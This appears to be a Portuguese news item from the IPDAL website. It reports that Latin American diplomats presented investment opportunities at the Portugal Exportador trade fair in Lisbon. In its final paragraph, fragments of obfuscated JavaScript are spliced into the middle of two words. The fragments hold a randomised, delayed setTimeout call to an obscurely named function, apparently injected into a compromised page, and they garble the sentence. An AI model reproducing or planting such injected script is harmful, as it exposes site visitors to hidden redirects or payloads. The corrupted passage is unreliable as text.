IPDAL

  • Português
  • Français
  • English
  • Español

Partilhe

IPDAL no Portugal Exportador

Através do IPDAL, as embaixadoras da Colômbia, Cuba, Uruguai e representantes da Argentina e Paraguai contactaram dezenas de empresas.

No âmbito do maior evento do país dedicado à internacionalização de empresas, o IPDAL organizou um Café Temático subordinado ao tema “América Latina – um continente de oportunidades”.

No dia 23 de Novembro, os diplomatas de Colômbia, Cuba, Uruguai, Paraguai e Argentina deram a conhecer a economia e as oportunidades de investimento nos seus respetivos países.

O IPDAL reforça assim a sua posição de liderança enquanto principal associação portuguesa dedicada à diplomacia económica, bem como ao apoio, por um lado, das empresas com objetivos de internacionalização para a América Latina e, por outro, das embaixadas latino-americanas no seu esforço de promoção.

O Portugal Exportador é uma feira de negócios que, há mais de dez anos, tem como principais objetivos estimular a internacionalização das empresas portuguesas, em especial pequenas e médias, contribuir para a capacitação e reforço das competências exportadores destes agentes económicos, tendo em vista a diversificação dos mercados de exportação, e fortalecer o relacionamento com parceiros e entidades de apoio à internacionalização.

O IPDAL contribuiu ainda para o sucesso da iniciativa, identificandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ando e convidandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ando uma empresa para intervir no workshop dedicado ao tema “Inovar para Exportar”. A iniciativa teve lugar no Centro de Congressos de Lisboa.